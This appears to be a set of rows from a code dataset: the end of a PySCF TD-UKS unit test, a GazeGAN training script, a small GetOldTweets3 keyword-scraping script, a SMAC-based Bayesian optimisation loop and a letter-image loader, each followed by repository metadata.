mol.spin = 2
mol.basis = '631g'
mol.build()
mf = scf.UHF(mol).run()
td_hf = tdscf.TDHF(mf).run(conv_tol=1e-12)
mf_lda = dft.UKS(mol).set(xc='lda', conv_tol=1e-12)
mf_lda.grids.prune = None
mf_lda = mf_lda.newton().run()
mf_bp86 = dft.UKS(mol).set(xc='b88,p86', conv_tol=1e-12)
mf_bp86.grids.prune = None
mf_bp86 = mf_bp86.newton().run()
mf_b3lyp = dft.UKS(mol).set(xc='b3lyp', conv_tol=1e-12)
mf_b3lyp.grids.prune = None
mf_b3lyp = mf_b3lyp.newton().run()
def diagonalize(a, b, nroots=4):
a_aa, a_ab, a_bb = a
b_aa, b_ab, b_bb = b
nocc_a, nvir_a, nocc_b, nvir_b = a_ab.shape
a_aa = a_aa.reshape((nocc_a*nvir_a,nocc_a*nvir_a))
a_ab = a_ab.reshape((nocc_a*nvir_a,nocc_b*nvir_b))
a_bb = a_bb.reshape((nocc_b*nvir_b,nocc_b*nvir_b))
b_aa = b_aa.reshape((nocc_a*nvir_a,nocc_a*nvir_a))
b_ab = b_ab.reshape((nocc_a*nvir_a,nocc_b*nvir_b))
b_bb = b_bb.reshape((nocc_b*nvir_b,nocc_b*nvir_b))
a = numpy.bmat([[ a_aa , a_ab],
[ a_ab.T, a_bb]])
b = numpy.bmat([[ b_aa , b_ab],
[ b_ab.T, b_bb]])
e = numpy.linalg.eig(numpy.bmat([[a , b ],
[-b.conj(),-a.conj()]]))[0]
lowest_e = numpy.sort(e[e.real > 0].real)[:nroots]
lowest_e = lowest_e[lowest_e > 1e-3]
return lowest_e
def tearDownModule():
global mol, mf, td_hf, mf_lda, mf_bp86, mf_b3lyp
mol.stdout.close()
del mol, mf, td_hf, mf_lda, mf_bp86, mf_b3lyp
class KnownValues(unittest.TestCase):
def test_nohbrid_lda(self):
td = tdscf.uks.TDDFTNoHybrid(mf_lda).set(conv_tol=1e-12)
es = td.kernel(nstates=4)[0]
a,b = td.get_ab()
e_ref = diagonalize(a, b, 6)
self.assertAlmostEqual(abs(es[:3]-e_ref[:3]).max(), 0, 8)
self.assertAlmostEqual(lib.finger(es[:3]*27.2114), 1.2946309669294163, 6)
def test_nohbrid_b88p86(self):
td = tdscf.uks.TDDFTNoHybrid(mf_bp86).set(conv_tol=1e-12)
es = td.kernel(nstates=4)[0]
a,b = td.get_ab()
e_ref = diagonalize(a, b, 6)
self.assertAlmostEqual(abs(es[:3]-e_ref[:3]).max(), 0, 8)
self.assertAlmostEqual(lib.finger(es[:3]*27.2114), 1.4624730971221087, 6)
def test_tddft_lda(self):
td = tdscf.uks.TDDFT(mf_lda).set(conv_tol=1e-12)
es = td.kernel(nstates=4)[0] * 27.2114
self.assertAlmostEqual(lib.finger(es[:3]), 1.2946309669294163, 6)
def test_tddft_b88p86(self):
td = tdscf.uks.TDDFT(mf_bp86).set(conv_tol=1e-12)
es = td.kernel(nstates=4)[0] * 27.2114
self.assertAlmostEqual(lib.finger(es[:3]), 1.4624730971221087, 6)
def test_tddft_b3lyp(self):
td = tdscf.uks.TDDFT(mf_b3lyp).set(conv_tol=1e-12)
es = td.kernel(nstates=4)[0] * 27.2114
self.assertAlmostEqual(lib.finger(es[:3]), 1.2984822994759448, 6)
def test_tda_b3lyp(self):
td = tdscf.TDA(mf_b3lyp).set(conv_tol=1e-12)
es = td.kernel(nstates=4)[0] * 27.2114
self.assertAlmostEqual(lib.finger(es[:3]), 1.4303636271767162, 6)
def test_tda_lda(self):
td = tdscf.TDA(mf_lda).set(conv_tol=1e-12)
es = td.kernel(nstates=4)[0] * 27.2114
self.assertAlmostEqual(lib.finger(es[:3]), 1.4581538269747121, 6)
def test_ab_hf(self):
mf = scf.UHF(mol).run()
a, b = tdscf.TDDFT(mf).get_ab()
ftda = tdscf.uhf.gen_tda_operation(mf)[0]
ftdhf = tdscf.uhf.gen_tdhf_operation(mf)[0]
nocc_a = numpy.count_nonzero(mf.mo_occ[0] == 1)
nvir_a = numpy.count_nonzero(mf.mo_occ[0] == 0)
nocc_b = numpy.count_nonzero(mf.mo_occ[1] == 1)
nvir_b = numpy.count_nonzero(mf.mo_occ[1] == 0)
numpy.random.seed(2)
xa, ya = numpy.random.random((2,nocc_a,nvir_a))
xb, yb = numpy.random.random((2,nocc_b,nvir_b))
x = numpy.hstack((xa.ravel(), xb.ravel()))
y = numpy.hstack((ya.ravel(), yb.ravel()))
xy = numpy.hstack((x, y))
ax_a = numpy.einsum('iajb,jb->ia', a[0], xa)
ax_a+= numpy.einsum('iajb,jb->ia', a[1], xb)
ax_b = numpy.einsum('jbia,jb->ia', a[1], xa)
ax_b+= numpy.einsum('iajb,jb->ia', a[2], xb)
ax = numpy.hstack((ax_a.ravel(), ax_b.ravel()))
self.assertAlmostEqual(abs(ax - ftda([x])).max(), 0, 9)
ay_a = numpy.einsum('iajb,jb->ia', a[0], ya)
ay_a+= numpy.einsum('iajb,jb->ia', a[1], yb)
ay_b = numpy.einsum('jbia,jb->ia', a[1], ya)
ay_b+= numpy.einsum('iajb,jb->ia', a[2], yb)
ay = numpy.hstack((ay_a.ravel(), ay_b.ravel()))
bx_a = numpy.einsum('iajb,jb->ia', b[0], xa)
bx_a+= numpy.einsum('iajb,jb->ia', b[1], xb)
bx_b = numpy.einsum('jbia,jb->ia', b[1], xa)
bx_b+= numpy.einsum('iajb,jb->ia', b[2], xb)
bx = numpy.hstack((bx_a.ravel(), bx_b.ravel()))
by_a = numpy.einsum('iajb,jb->ia', b[0], ya)
by_a+= numpy.einsum('iajb,jb->ia', b[1], yb)
by_b = numpy.einsum('jbia,jb->ia', b[1], ya)
by_b+= numpy.einsum('iajb,jb->ia', b[2], yb)
by = numpy.hstack((by_a.ravel(), by_b.ravel()))
ab1 = ax + by
ab2 =-bx - ay
ab12 = numpy.hstack((ab1.ravel(),ab2.ravel()))
abxy_ref = ftdhf([xy])
self.assertAlmostEqual(abs(ab12 - abxy_ref).max(), 0, 9)
def test_ab_lda(self):
mf = mf_lda
a, b = tdscf.TDDFT(mf).get_ab()
ftda = tdscf.uhf.gen_tda_operation(mf)[0]
ftdhf = tdscf.uhf.gen_tdhf_operation(mf)[0]
nocc_a = numpy.count_nonzero(mf.mo_occ[0] == 1)
nvir_a = numpy.count_nonzero(mf.mo_occ[0] == 0)
nocc_b = numpy.count_nonzero(mf.mo_occ[1] == 1)
nvir_b = numpy.count_nonzero(mf.mo_occ[1] == 0)
numpy.random.seed(2)
xa, ya = numpy.random.random((2,nocc_a,nvir_a))
xb, yb = numpy.random.random((2,nocc_b,nvir_b))
x = numpy.hstack((xa.ravel(), xb.ravel()))
y = numpy.hstack((ya.ravel(), yb.ravel()))
xy = numpy.hstack((x, y))
ax_a = numpy.einsum('iajb,jb->ia', a[0], xa)
ax_a+= numpy.einsum('iajb,jb->ia', a[1], xb)
ax_b = numpy.einsum('jbia,jb->ia', a[1], xa)
ax_b+= numpy.einsum('iajb,jb->ia', a[2], xb)
ax = numpy.hstack((ax_a.ravel(), ax_b.ravel()))
self.assertAlmostEqual(abs(ax - ftda([x])).max(), 0, 9)
ay_a = numpy.einsum('iajb,jb->ia', a[0], ya)
ay_a+= numpy.einsum('iajb,jb->ia', a[1], yb)
ay_b = numpy.einsum('jbia,jb->ia', a[1], ya)
ay_b+= numpy.einsum('iajb,jb->ia', a[2], yb)
ay = numpy.hstack((ay_a.ravel(), ay_b.ravel()))
bx_a = numpy.einsum('iajb,jb->ia', b[0], xa)
bx_a+= numpy.einsum('iajb,jb->ia', b[1], xb)
bx_b = numpy.einsum('jbia,jb->ia', b[1], xa)
bx_b+= numpy.einsum('iajb,jb->ia', b[2], xb)
bx = numpy.hstack((bx_a.ravel(), bx_b.ravel()))
by_a = numpy.einsum('iajb,jb->ia', b[0], ya)
by_a+= numpy.einsum('iajb,jb->ia', b[1], yb)
by_b = numpy.einsum('jbia,jb->ia', b[1], ya)
by_b+= numpy.einsum('iajb,jb->ia', b[2], yb)
by = numpy.hstack((by_a.ravel(), by_b.ravel()))
ab1 = ax + by
ab2 =-bx - ay
ab12 = numpy.hstack((ab1.ravel(),ab2.ravel()))
abxy_ref = ftdhf([xy])
self.assertAlmostEqual(abs(ab12 - abxy_ref).max(), 0, 9)
def test_ab_b3lyp(self):
mf = mf_b3lyp
a, b = tdscf.TDDFT(mf).get_ab()
ftda = tdscf.uhf.gen_tda_operation(mf)[0]
ftdhf = tdscf.uhf.gen_tdhf_operation(mf)[0]
nocc_a = numpy.count_nonzero(mf.mo_occ[0] == 1)
nvir_a = numpy.count_nonzero(mf.mo_occ[0] == 0)
nocc_b = numpy.count_nonzero(mf.mo_occ[1] == 1)
nvir_b = numpy.count_nonzero(mf.mo_occ[1] == 0)
numpy.random.seed(2)
xa, ya = numpy.random.random((2,nocc_a,nvir_a))
xb, yb = numpy.random.random((2,nocc_b,nvir_b))
x = numpy.hstack((xa.ravel(), xb.ravel()))
y = numpy.hstack((ya.ravel(), yb.ravel()))
xy = numpy.hstack((x, y))
ax_a = numpy.einsum('iajb,jb->ia', a[0], xa)
ax_a+= numpy.einsum('iajb,jb->ia', a[1], xb)
ax_b = numpy.einsum('jbia,jb->ia', a[1], xa)
ax_b+= numpy.einsum('iajb,jb->ia', a[2], xb)
ax = numpy.hstack((ax_a.ravel(), ax_b.ravel()))
self.assertAlmostEqual(abs(ax - ftda([x])).max(), 0, 9)
ay_a = numpy.einsum('iajb,jb->ia', a[0], ya)
ay_a+= numpy.einsum('iajb,jb->ia', a[1], yb)
ay_b = numpy.einsum('jbia,jb->ia', a[1], ya)
ay_b+= numpy.einsum('iajb,jb->ia', a[2], yb)
ay = numpy.hstack((ay_a.ravel(), ay_b.ravel()))
bx_a = numpy.einsum('iajb,jb->ia', b[0], xa)
bx_a+= numpy.einsum('iajb,jb->ia', b[1], xb)
bx_b = numpy.einsum('jbia,jb->ia', b[1], xa)
bx_b+= numpy.einsum('iajb,jb->ia', b[2], xb)
bx = numpy.hstack((bx_a.ravel(), bx_b.ravel()))
by_a = numpy.einsum('iajb,jb->ia', b[0], ya)
by_a+= numpy.einsum('iajb,jb->ia', b[1], yb)
by_b = numpy.einsum('jbia,jb->ia', b[1], ya)
by_b+= numpy.einsum('iajb,jb->ia', b[2], yb)
by = numpy.hstack((by_a.ravel(), by_b.ravel()))
ab1 = ax + by
ab2 =-bx - ay
ab12 = numpy.hstack((ab1.ravel(),ab2.ravel()))
abxy_ref = ftdhf([xy])
self.assertAlmostEqual(abs(ab12 - abxy_ref).max(), 0, 9)
def test_nto(self):
mf = scf.UHF(mol).run()
td = tdscf.TDA(mf).run()
w, nto = td.get_nto(state=1)
self.assertAlmostEqual(w[0][0], 0.00018520143461015, 9)
self.assertAlmostEqual(w[1][0], 0.99963372674044326, 9)
self.assertAlmostEqual(lib.finger(w[0]), 0.00027305600430816, 9)
self.assertAlmostEqual(lib.finger(w[1]), 0.99964370569529093, 9)
pmol = copy.copy(mol)
pmol.symmetry = True
pmol.build(0, 0)
mf = scf.UHF(pmol).run()
td = tdscf.TDA(mf).run(nstates=3)
w, nto = td.get_nto(state=0)
self.assertAlmostEqual(w[0][0], 0.00018520143461016, 9)
self.assertAlmostEqual(w[1][0], 0.99963372674044326, 9)
self.assertAlmostEqual(lib.finger(w[0]), 0.00027305600430816, 9)
self.assertAlmostEqual(lib.finger(w[1]), 0.99964370569529093, 9)
w, nto = td.get_nto(state=-1)
self.assertAlmostEqual(w[0][0], 0.00236940007134660, 9)
self.assertAlmostEqual(w[1][0], 0.99759687228056182, 9)
def test_analyze(self):
f = td_hf.oscillator_strength(gauge='length')
self.assertAlmostEqual(lib.finger(f), 0.16147450863004867, 7)
f = td_hf.oscillator_strength(gauge='velocity', order=2)
self.assertAlmostEqual(lib.finger(f), 0.19750347627735745, 6)
td_hf.analyze()
def test_init(self):
hf = scf.UHF(mol)
ks = scf.UKS(mol)
kshf = scf.UKS(mol).set(xc='HF')
self.assertTrue(isinstance(tdscf.TDA(hf), tdscf.uhf.TDA))
self.assertTrue(isinstance(tdscf.TDA(ks), tdscf.uks.TDA))
self.assertTrue(isinstance(tdscf.TDA(kshf), tdscf.uks.TDA))
self.assertTrue(isinstance(tdscf.RPA(hf), tdscf.uhf.TDHF))
self.assertTrue(isinstance(tdscf.RPA(ks), tdscf.uks.TDDFTNoHybrid))
self.assertTrue(isinstance(tdscf.RPA(kshf), tdscf.uks.TDDFT))
self.assertTrue(isinstance(tdscf.TDDFT(hf), tdscf.uhf.TDHF))
self.assertTrue(isinstance(tdscf.TDDFT(ks), tdscf.uks.TDDFTNoHybrid))
self.assertTrue(isinstance(tdscf.TDDFT(kshf), tdscf.uks.TDDFT))
self.assertRaises(RuntimeError, tdscf.dRPA, hf)
self.assertTrue(isinstance(tdscf.dRPA(kshf), tdscf.uks.dRPA))
self.assertTrue(isinstance(tdscf.dRPA(ks), tdscf.uks.dRPA))
self.assertRaises(RuntimeError, tdscf.dTDA, hf)
self.assertTrue(isinstance(tdscf.dTDA(kshf), tdscf.uks.dTDA))
self.assertTrue(isinstance(tdscf.dTDA(ks), tdscf.uks.dTDA))
def test_tda_with_wfnsym(self):
pmol = mol.copy()
pmol.symmetry = True
pmol.build(0, 0)
mf = dft.UKS(pmol).run()
td = tdscf.uks.TDA(mf)
td.wfnsym = 'B1'
es = td.kernel(nstates=3)[0]
self.assertAlmostEqual(lib.finger(es), 0.16350926466999033, 6)
td.analyze()
def test_tdhf_with_wfnsym(self):
pmol = mol.copy()
pmol.symmetry = True
pmol.build()
mf = scf.UHF(pmol).run()
td = tdscf.uhf.TDHF(mf)
td.wfnsym = 'B1'
td.nroots = 3
es = td.kernel()[0]
self.assertAlmostEqual(lib.finger(es), 0.11306948533259675, 6)
td.analyze()
def test_tddft_with_wfnsym(self):
pmol = mol.copy()
pmol.symmetry = True
pmol.build()
mf = dft.UKS(pmol).run()
td = tdscf.uks.TDDFTNoHybrid(mf)
td.wfnsym = 'B1'
td.nroots = 3
es = td.kernel()[0]
self.assertAlmostEqual(lib.finger(es), 0.15403661700414412, 6)
td.analyze()
if __name__ == "__main__":
print("Full Tests for TD-UKS")
unittest.main()
| [
"[email protected]"
] | |
8aa66e9bfbe8bd636da164d691be14c9753a0cf6 | 2e318c8fdbb8e8826937ffbf1eede7034a47960a | /GazeGAN_using_CSC/train_old1.py | 3a4c6f4bdfa7d3250a264ab2b5f775c39e7fdeb4 | [] | no_license | chenkeshuai/Sal-CFS-GAN | e06efbe5e49360c8f5634704c487483795c10d31 | 8ae0fb77efff503190bcc8b6333c1d21ea1bfbce | refs/heads/master | 2022-06-06T01:18:00.664722 | 2020-05-06T10:54:11 | 2020-05-06T10:54:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,507 | py | ### Copyright (C) 2017 NVIDIA Corporation. All rights reserved.
### Licensed under the CC BY-NC-SA 4.0 license (https://creativecommons.org/licenses/by-nc-sa/4.0/legalcode).
import time
from collections import OrderedDict
from options.train_options import TrainOptions
from data.data_loader import CreateDataLoader
from models.models import create_model
import util.util as util
from util.visualizer import Visualizer
import os
import numpy as np
import torch
from torch.autograd import Variable
opt = TrainOptions().parse()
iter_path = os.path.join(opt.checkpoints_dir, opt.name, 'iter.txt')
if opt.continue_train:
try:
start_epoch, epoch_iter = np.loadtxt(iter_path , delimiter=',', dtype=int)
except:
start_epoch, epoch_iter = 1, 0
print('Resuming from epoch %d at iteration %d' % (start_epoch, epoch_iter))
else:
start_epoch, epoch_iter = 1, 0
if opt.debug:
opt.display_freq = 1
opt.print_freq = 1
opt.niter = 1
opt.niter_decay = 0
opt.max_dataset_size = 10
data_loader = CreateDataLoader(opt)
dataset = data_loader.load_data()
dataset_size = len(data_loader)
print('#training images = %d' % dataset_size)
model = create_model(opt)
visualizer = Visualizer(opt)
total_steps = (start_epoch-1) * dataset_size + epoch_iter
display_delta = total_steps % opt.display_freq
print_delta = total_steps % opt.print_freq
save_delta = total_steps % opt.save_latest_freq
My_Limit = 600 # just for debugging phase, to control the total training steps for saving time
for epoch in range(start_epoch, opt.niter + opt.niter_decay + 1):
epoch_start_time = time.time()
if epoch != start_epoch:
epoch_iter = epoch_iter % dataset_size
for i, data in enumerate(dataset, start=epoch_iter):
if(i > My_Limit):
break
iter_start_time = time.time()
total_steps += opt.batchSize
epoch_iter += opt.batchSize
# whether to collect output images
save_fake = total_steps % opt.display_freq == display_delta
############## Forward Pass ######################
losses, generated = model(Variable(data['label']), Variable(data['inst']),
Variable(data['image']), Variable(data['feat']), infer=save_fake)
# sum per device losses
losses = [ torch.mean(x) if not isinstance(x, int) else x for x in losses ]
loss_dict = dict(zip(model.module.loss_names, losses))
print("loss dict is :", loss_dict)
# calculate final loss scalar
# loss_D = (loss_dict['D_fake'] + loss_dict['D_real']) * 0.5
# loss_G = loss_dict['G_GAN'] + loss_dict.get('G_GAN_Feat',0) + loss_dict.get('G_VGG',0)
loss_D = (loss_dict['D_fake'] + loss_dict['D_real']) * 0.5
loss_G = loss_dict['G_GAN'] + loss_dict.get('G_GAN_Feat',0) + loss_dict.get('G_VGG',0) + loss_dict.get('Loss_CC',0)
print("CC loss is :", loss_dict.get('Loss_CC',0))
############### Backward Pass ####################
# update generator weights
model.module.optimizer_G.zero_grad()
loss_G.backward()
model.module.optimizer_G.step()
# update discriminator weights
model.module.optimizer_D.zero_grad()
loss_D.backward()
model.module.optimizer_D.step()
#call(["nvidia-smi", "--format=csv", "--query-gpu=memory.used,memory.free"])
############## Display results and errors ##########
### print out errors
if total_steps % opt.print_freq == print_delta:
errors = {k: v.data[0] if not isinstance(v, int) else v for k, v in loss_dict.items()}
t = (time.time() - iter_start_time) / opt.batchSize
visualizer.print_current_errors(epoch, epoch_iter, errors, t)
visualizer.plot_current_errors(errors, total_steps)
### display output images
if save_fake:
visuals = OrderedDict([('input_label', util.tensor2label(data['label'][0], opt.label_nc)),
('synthesized_image', util.tensor2im(generated.data[0])),
('real_image', util.tensor2im(data['image'][0]))])
visualizer.display_current_results(visuals, epoch, total_steps)
### save latest model
if total_steps % opt.save_latest_freq == save_delta:
print('saving the latest model (epoch %d, total_steps %d)' % (epoch, total_steps))
model.module.save('latest')
np.savetxt(iter_path, (epoch, epoch_iter), delimiter=',', fmt='%d')
if epoch_iter >= dataset_size:
break
# end of epoch
iter_end_time = time.time()
print('End of epoch %d / %d \t Time Taken: %d sec' %
(epoch, opt.niter + opt.niter_decay, time.time() - epoch_start_time))
'''
### save model for this epoch
if epoch % opt.save_epoch_freq == 0:
print('saving the model at the end of epoch %d, iters %d' % (epoch, total_steps))
model.module.save('latest')
model.module.save(epoch)
np.savetxt(iter_path, (epoch+1, 0), delimiter=',', fmt='%d')
'''
### instead of only training the local enhancer, train the entire network after certain iterations
if (opt.niter_fix_global != 0) and (epoch == opt.niter_fix_global):
model.module.update_fixed_params()
### linearly decay learning rate after certain iterations
if epoch > opt.niter:
model.module.update_learning_rate()
| [
"[email protected]"
] | |
effa795ba011f8dc2f6b6da9ac6642b41478c955 | ac2567d2be46412f10a47aba6b062347fb831ec9 | /twitterTest.py | d48b78dc469f066c5c8a5c8ce76e0454cb493cd7 | [] | no_license | rhymg/TwitterScraping | e9e8d4098ba4d28cdb0d17f76de98a81c08432aa | 769effdbdf83a170c13d2cac51ca5df7956e2dab | refs/heads/master | 2022-11-24T11:46:46.637370 | 2020-07-18T19:19:17 | 2020-07-18T19:19:17 | 280,906,432 | 0 | 0 | null | 2020-07-19T16:34:18 | 2020-07-19T16:34:17 | null | UTF-8 | Python | false | false | 531 | py | import GetOldTweets3 as got;
word = 'fuck';
f = open("usernameTest.txt", "a");
tweetCriteria = got.manager.TweetCriteria().setQuerySearch(word).setMaxTweets(10);
tweets = got.manager.TweetManager.getTweets(tweetCriteria);
for tweet in tweets:
print(tweet.text + ' BY: ' + tweet.username + '\n');
if word in tweet.text.lower():
print('This has ' + word + ' in it.\n');
f.write(tweet.username + '\n');
else:
print('This does not have ' + word + ' in it.\n');
f.close();
| [
"[email protected]"
] | |
e0764768d0223253f5b731c708b8922ab74d8968 | 5ca0124a85bae76c73643246372898823345d5a9 | /pc_smac/pc_smbo/pc_smbo.py | 1f7aabbf310d2acffee21d378336e2e4064140b0 | [] | no_license | jtuyls/pc_smac | 8ebdd76e4ea2ce837dfd7d03d37f446a86094c57 | 0a6e8719438a3f510e0aaeda19c14dd8005d8c65 | refs/heads/master | 2021-08-14T18:15:00.162943 | 2017-06-10T10:52:56 | 2017-06-10T10:52:56 | 76,661,120 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 13,167 | py |
# This file is heavily based on the pc_smbo file of SMAC which can be found here:
# https://github.com/automl/SMAC3
import itertools
import math
import numpy as np
import logging
import typing
import time
import random
from smac.optimizer.base_solver import BaseSolver
from smac.epm.rf_with_instances import RandomForestWithInstances
from smac.optimizer.local_search import LocalSearch
from smac.intensification.intensification import Intensifier
from smac.optimizer import pSMAC
from smac.scenario.scenario import Scenario
from smac.runhistory.runhistory import RunHistory
from smac.runhistory.runhistory2epm import AbstractRunHistory2EPM
from smac.stats.stats import Stats
from smac.initial_design.initial_design import InitialDesign
from smac.tae.execute_ta_run import FirstRunCrashedException
from smac.optimizer.select_configurations import SelectConfigurations
class PCSMBO(BaseSolver):
def __init__(self,
scenario: Scenario,
stats: Stats,
initial_design: InitialDesign,
runhistory: RunHistory,
runhistory2epm: AbstractRunHistory2EPM,
intensifier: Intensifier,
aggregate_func: callable,
num_run: int,
model: RandomForestWithInstances,
rng: np.random.RandomState,
select_configuration: SelectConfigurations,
double_intensification: bool):
'''
Interface that contains the main Bayesian optimization loop
Parameters
----------
scenario: smac.scenario.scenario.Scenario
Scenario object
stats: Stats
statistics object with configuration budgets
initial_design: InitialDesign
initial sampling design
runhistory: RunHistory
runhistory with all runs so far
runhistory2epm : AbstractRunHistory2EPM
Object that implements the AbstractRunHistory2EPM to convert runhistory data into EPM data
intensifier: Intensifier
intensification of new challengers against incumbent configuration (probably with some kind of racing on the instances)
aggregate_func: callable
how to aggregate the runs in the runhistory to get the performance of a configuration
num_run: int
id of this run (used for pSMAC)
model: RandomForestWithInstances
empirical performance model (right now, we support only RandomForestWithInstances)
rng: np.random.RandomState
Random number generator
'''
self.logger = logging.getLogger("SMBO")
self.incumbent = None
self.scenario = scenario
self.config_space = scenario.cs
self.stats = stats
self.initial_design = initial_design
self.runhistory = runhistory
self.rh2EPM = runhistory2epm
self.intensifier = intensifier
self.aggregate_func = aggregate_func
self.num_run = num_run
self.model = model
self.rng = rng
self.select_configuration = select_configuration
self.double_intensification = double_intensification
def run(self):
'''
Runs the Bayesian optimization loop
Returns
----------
incumbent: np.array(1, H)
The best found configuration
'''
self.stats.start_timing()
try:
self.incumbent = self.initial_design.run()
except FirstRunCrashedException as err:
if self.scenario.abort_on_first_run_crash:
raise
# Main BO loop
iteration = 1
while True:
if self.scenario.shared_model:
pSMAC.read(run_history=self.runhistory,
output_directory=self.scenario.output_dir,
configuration_space=self.config_space,
logger=self.logger)
start_time = time.time()
X, Y = self.rh2EPM.transform(self.runhistory)
#print("Shapes: {}, {}".format(X.shape, Y.shape))
self.logger.debug("Search for next configuration")
if self.double_intensification:
# get all found configurations sorted according to acq
challengers_smac, challengers_random = \
self.select_configuration.run(X, Y,
incumbent=self.incumbent,
num_configurations_by_random_search_sorted=100,
num_configurations_by_local_search=10,
double_intensification=self.double_intensification)
time_spend = time.time() - start_time
logging.debug(
"Time spend to choose next configurations: %.2f sec" % (time_spend))
self.logger.debug("Intensify")
start_time_random = time.time()
self.incumbent, inc_perf = self.intensifier.intensify(
challengers=challengers_random,
incumbent=self.incumbent,
run_history=self.runhistory,
aggregate_func=self.aggregate_func,
time_bound=max(0.01, time_spend / 2.),
min_number_of_runs=1)
time_spend_random = time.time() - start_time_random
#print("IN BETWEEN INTENSIFICATIONS")
self.incumbent, inc_perf = self.intensifier.intensify(
challengers=challengers_smac,
incumbent=self.incumbent,
run_history=self.runhistory,
aggregate_func=self.aggregate_func,
time_bound=max(0.01, time_spend_random),
min_number_of_runs=1)
else:
# get all found configurations sorted according to acq
challengers = \
self.select_configuration.run(X, Y,
incumbent=self.incumbent,
num_configurations_by_random_search_sorted=100,
num_configurations_by_local_search=10,
double_intensification=self.double_intensification)
#print("Challengers: {}".format(challengers))
time_spend = time.time() - start_time
logging.debug(
"Time spend to choose next configurations: %.2f sec" % (time_spend))
self.logger.debug("Intensify")
self.incumbent, inc_perf = self.intensifier.intensify(
challengers=challengers,
incumbent=self.incumbent,
run_history=self.runhistory,
aggregate_func=self.aggregate_func,
time_bound=max(0.01, time_spend),
min_number_of_runs=2)
print("Incumbent: {}, Performance: {}".format(self.incumbent, inc_perf))
if self.scenario.shared_model:
pSMAC.write(run_history=self.runhistory,
output_directory=self.scenario.output_dir,
num_run=self.num_run)
iteration += 1
logging.debug("Remaining budget: %f (wallclock), %f (ta costs), %f (target runs)" % (
self.stats.get_remaing_time_budget(),
self.stats.get_remaining_ta_budget(),
self.stats.get_remaining_ta_runs()))
if self.stats.is_budget_exhausted():
break
self.stats.print_stats(debug_out=True)
return self.incumbent
class PCSMBOSigmoidRandomSearch(BaseSolver):
def __init__(self,
scenario: Scenario,
stats: Stats,
initial_design: InitialDesign,
runhistory: RunHistory,
runhistory2epm: AbstractRunHistory2EPM,
intensifier: Intensifier,
aggregate_func: callable,
num_run: int,
model: RandomForestWithInstances,
rng: np.random.RandomState,
select_configuration: SelectConfigurations):
'''
Interface that contains the main Bayesian optimization loop
Parameters
----------
scenario: smac.scenario.scenario.Scenario
Scenario object
stats: Stats
statistics object with configuration budgets
initial_design: InitialDesign
initial sampling design
runhistory: RunHistory
runhistory with all runs so far
runhistory2epm : AbstractRunHistory2EPM
Object that implements the AbstractRunHistory2EPM to convert runhistory data into EPM data
intensifier: Intensifier
intensification of new challengers against incumbent configuration (probably with some kind of racing on the instances)
aggregate_func: callable
how to aggregate the runs in the runhistory to get the performance of a configuration
num_run: int
id of this run (used for pSMAC)
model: RandomForestWithInstances
empirical performance model (right now, we support only RandomForestWithInstances)
rng: np.random.RandomState
Random number generator
'''
self.logger = logging.getLogger("SMBO")
self.incumbent = None
self.scenario = scenario
self.config_space = scenario.cs
self.stats = stats
self.initial_design = initial_design
self.runhistory = runhistory
self.rh2EPM = runhistory2epm
self.intensifier = intensifier
self.aggregate_func = aggregate_func
self.num_run = num_run
self.model = model
self.rng = rng
self.select_configuration = select_configuration
def run(self):
'''
Runs the Bayesian optimization loop
Returns
----------
incumbent: np.array(1, H)
The best found configuration
'''
self.stats.start_timing()
try:
self.incumbent = self.initial_design.run()
except FirstRunCrashedException as err:
if self.scenario.abort_on_first_run_crash:
raise
# Main BO loop
iteration = 1
intensification_runtime = 0
while True:
if self.scenario.shared_model:
pSMAC.read(run_history=self.runhistory,
output_directory=self.scenario.output_dir,
configuration_space=self.config_space,
logger=self.logger)
start_time = time.time()
X, Y = self.rh2EPM.transform(self.runhistory)
#print("Shapes: {}, {}".format(X.shape, Y.shape))
self.logger.debug("Search for next configuration")
# get all found configurations sorted according to acq
challengers = \
self.select_configuration.run(X, Y,
incumbent=self.incumbent,
timing_previous_run=intensification_runtime,
num_configurations_by_random_search_sorted=100,
num_configurations_by_local_search=10)
#print("Challengers: {}".format(challengers))
time_spend = time.time() - start_time
logging.debug(
"Time spend to choose next configurations: %.2f sec" % (time_spend))
self.logger.debug("Intensify")
start_time = time.time()
self.incumbent, inc_perf = self.intensifier.intensify(
challengers=challengers,
incumbent=self.incumbent,
run_history=self.runhistory,
aggregate_func=self.aggregate_func,
time_bound=max(0.01, time_spend),
min_number_of_runs=2)
intensification_runtime = time.time() - start_time
#print("Intensification runtime: {}".format(intensification_runtime))
#print("Incumbent: {}, Performance: {}".format(self.incumbent, inc_perf))
if self.scenario.shared_model:
pSMAC.write(run_history=self.runhistory,
output_directory=self.scenario.output_dir,
num_run=self.num_run)
iteration += 1
logging.debug("Remaining budget: %f (wallclock), %f (ta costs), %f (target runs)" % (
self.stats.get_remaing_time_budget(),
self.stats.get_remaining_ta_budget(),
self.stats.get_remaining_ta_runs()))
if self.stats.is_budget_exhausted():
break
self.stats.print_stats(debug_out=True)
return self.incumbent | [
"[email protected]"
] | |
ef7e4cf3a4bc9c1068b4866be245fb998a0ef38f | f8101363fff2bec14a152c3ba6d4d7f5e2e73c0a | /filehandler.py | 00455f9644e5cda9f545d150b167edf7f9015dc4 | [] | no_license | Adsime/TDT4173-A5 | 25e89ea4489454587a805bc5b58387c6c5bdf929 | 66d2547503c900b9d3e84d41c408fbc6243cdb31 | refs/heads/master | 2020-03-14T17:07:40.041536 | 2018-05-04T19:56:00 | 2018-05-04T19:56:00 | 131,712,698 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 716 | py | import matplotlib.image as img
from image import Image as dimg
import numpy as np
letter_path = "./data/chars74k-lite/"
detection_path = "./data/detection-images/detection-"
extension = ".jpg"
def read_letter_images(letter):
letter_images = []
try:
i = 0
while True:
image = dimg(img.imread(letter_path + letter + "/" + letter + "_" + i.__str__() + extension), letter)
letter_images.append(image)
i += 1
except FileNotFoundError:
pass
print("Images for " + letter + " loaded successfully")
return np.array(letter_images)
def read_detection_image(identifier):
return img.imread(detection_path + identifier.__str__() + extension) | [
"[email protected]"
] | |
